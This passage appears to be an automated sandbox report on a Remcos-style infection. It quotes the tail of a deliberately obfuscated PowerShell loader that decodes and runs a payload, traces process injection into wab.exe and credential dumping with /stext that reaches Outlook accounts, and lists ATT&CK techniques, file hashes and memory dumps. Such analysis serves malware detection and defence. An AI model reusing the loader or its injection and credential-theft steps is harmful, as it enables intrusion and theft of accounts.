;$skriftsted=$Vanadates[$Praksisndringen139];}$Opposit=316532;$bankekds=30167;Hjttaleranlggenes (Hosernes ' .rdkla$UnderlegOversetlStandaroundstnvbOari paaEmbarkulUforsta:SnorksoU OmklasvKoe.sisoMump,rirsocialcnSla ekohTrans,oeFyreseddVer ifu A,elard= Fughet vaskomGvalo,uneEpoxy.atGenerat- Disa.pCElectrooA lersin Skjoldt Skat eeSi nficnFolke,itBarthia Forldea$PinjrakHFrinumraUddatablGrv.ingv igeretfPr.image U.pindmTeorichsBolarenaHisoveraNusser r KonseriDemocragPbelag.eSivenes1Transpa8Udblsni1Konsumf ');Hjttaleranlggenes (Hosernes ' Cornif$ Gu.umigStorgo lForfiltob,stedabNihcancaWatchhol Overfl:Kil,calMFormelli Bagwors ToldpopForankruDatidigtIndvoldtWhistleiHalvdannDuttetsgFor,etn Lynched= Turner Odontot[ SuffecSPreoccuyGvestessDi putat OevredeOvero,fm edrin.DepraveCCarneoloSpallspnFolkfotvMetalleeSatyrisr,endbartvobisga].opfolk:Bill,dh:udkonkuFsektorsrAfnatiooNonillumAdresseBMagtspia igtelss ommyereBrazils6 U.iten4 P eridS Cowf,ot pe.levrSep,imaiNondir.nKunstakg.tenogr(.ealisa$UncrumpU uperevUndergroNo.coherBruger,nP eoccuh UnisepeUrbanisdXiphosu)Beklage ');Hjttaleranlggenes (Hosernes 'Fremfus$JenaabngPassemelEllekiloB,naadobOdmarkoa Lal palLatestp:RigtigsiMic,onimRondaweb buketti DikessbAirligheSemicosrstatsejsBohem.b Opsgn.n=taberen Hyb,nkr[In dmmeSPukk,lsyVelbeslsVrdi,ovtR melige PterotmHyperki. BortelTCigarmaeRememorxGri mestSe,undy.berigelEUst.rlinSiegernc Lok,mooEnergipd Disfavi IsocyanResurregBoxbush],lwinhe:Brahman:ShoedepARisk esSVestjydC BronzeIS ivelsI.efence.TringciGStrickse Teks,etU vikliSGuaguantFa sterrOrchieciop,tninn MervfogCe.eban(Al enhe$Liga urMHen,tani Hypoc sStkningpPara.rau eft.rtt kyggestUdklknii,edsaltnGalninggAfskovn)Fiskepl ');Hjttaleranlggenes (Hosernes '.enophi$Natanieg dublerl ,iberaogymnostbRes.edlaJrgineslForeimp:DioxinsD UdslynuEmulsiofUdmn,esfVandetteIn laeslGennemscutriculoBintjeka Midd ltEmbo.tee Ove,vurUlidelin Cam,hoeBlokade=Checken$Unpla tiFrkenermm,adedibPowe,lei.ndgangbBurstine .ntrffr Bolshis Pounce.UnplashsEleva,ouPenaeagbBrochursT.ntacutEmydianrPygobraiGuar,ranKa akomg Morefo(uranome$SpaltniOfremdrapUnimpowpKulde,yoDa nebrs MiswenipeplesstAbomina,Pyrheli$ risikobInd,indasote.ionSatanisk Styr ne BrevskkLovtidedUn.uckismanip l)Gni.end ');Hjttaleranlggenes $Duffelcoaterne;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1040

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Retsvidners.For && echo t"
4⤵
PID:348

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:888

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ngyeuwpnzjwltch"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1100

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yjlxvoapmroqvivlqp"
5⤵
- Accesses Microsoft Outlook accounts
PID:1612

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\idqhwgliiagvforpzaxafs"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1472

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat
Filesize
144B

MD5
a87d40c581c3d7a351e4c8a6d5e3d755

SHA1
053d0ac2f6cb685720d26bf1014b17f4d8ba2c5a

SHA256
9b87496f8c806ed23cf194e56771fe7cc6d5bc88a43ab7275a89ab7e69dbbb10

SHA512
7d47d48b185e62a7b480fca61045963c26bac18680f381135bdea54faad186972790ee810d76b16cc3fcb51c624e62e1372315b5a957d547b208e2cf8ffa8552

Download Submit
C:\Users\Admin\AppData\Local\Temp\ngyeuwpnzjwltch
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NYEWX5HBWRXAGLGYF1U4.temp
Filesize
7KB

MD5
91bb41d1b63f84be3cc04666ca2b18b6

SHA1
e49aab7e73b50dd6afaafaaef3871855335d5803

SHA256
67b4bd916ce3d9838100aaa6b131bb181ece63199ae5fc62027801a3a9cf8959

SHA512
52f20a25e1ab241fc58ac92e18b6ab46f9bbb49ab88ac39753abce69e89a68466e75a0d83b8c930f64264ef5091b06fce2496469e0250f679106da74074f50a4

Download Submit
C:\Users\Admin\AppData\Roaming\Retsvidners.For
Filesize
451KB

MD5
4b027f10a9ba55fbce88cc0de8552d86

SHA1
d9ff1ca78a85579006efb1aa6cf5b55c8d5cf079

SHA256
46be653f722c5d6427efd1d53e3197cc24aba34c3c0d525ba1f27e189614421e

SHA512
f0c6b56185c82ac4ad34578f8442009e935bd99d4e4750bbd8edda446200fd1b003078f5a1e674813fada341e1aa214b09fefdb63f14065338f3d5685a9072c1

Download Submit
memory/888-69-0x00000000048D0000-0x00000000048E9000-memory.dmp

Filesize
100KB

Download
memory/888-42-0x00000000002D0000-0x0000000001332000-memory.dmp

Filesize
16.4MB

Download
memory/888-83-0x00000000002D0000-0x0000000001332000-memory.dmp

Filesize
16.4MB

Download
memory/888-80-0x00000000002D0000-0x0000000001332000-memory.dmp

Filesize
16.4MB

Download
memory/888-77-0x00000000002D0000-0x0000000001332000-memory.dmp

Filesize
16.4MB

Download
memory/888-74-0x00000000002D0000-0x0000000001332000-memory.dmp

Filesize
16.4MB

Download
memory/888-71-0x00000000002D0000-0x0000000001332000-memory.dmp

Filesize
16.4MB

Download
memory/888-58-0x00000000002D0000-0x0000000001332000-memory.dmp

Filesize
16.4MB

Download
memory/888-37-0x00000000002D0000-0x0000000001332000-memory.dmp

Filesize
16.4MB

Download
memory/888-65-0x00000000048D0000-0x00000000048E9000-memory.dmp

Filesize
100KB

Download
memory/888-68-0x00000000048D0000-0x00000000048E9000-memory.dmp

Filesize
100KB

Download
memory/1040-36-0x0000000006660000-0x0000000009512000-memory.dmp

Filesize
46.7MB

Download
memory/1100-53-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1100-47-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1100-46-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1100-50-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1472-56-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1472-55-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1472-57-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1612-52-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1612-51-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1612-49-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2616-21-0x000007FEF635E000-0x000007FEF635F000-memory.dmp

Filesize
4KB

Download
memory/2616-23-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2616-26-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

Filesize
9.6MB

Download
memory/2616-41-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

Filesize
9.6MB

Download
memory/2616-24-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

Filesize
9.6MB

Download
memory/2616-22-0x000000001B790000-0x000000001BA72000-memory.dmp

Filesize
2.9MB

Download
memory/2616-25-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

Filesize
9.6MB

Download
memory/2616-29-0x000007FEF635E000-0x000007FEF635F000-memory.dmp

Filesize
4KB

Download
memory/2616-28-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

Filesize
9.6MB

Download
memory/2616-27-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

Filesize
9.6MB

Download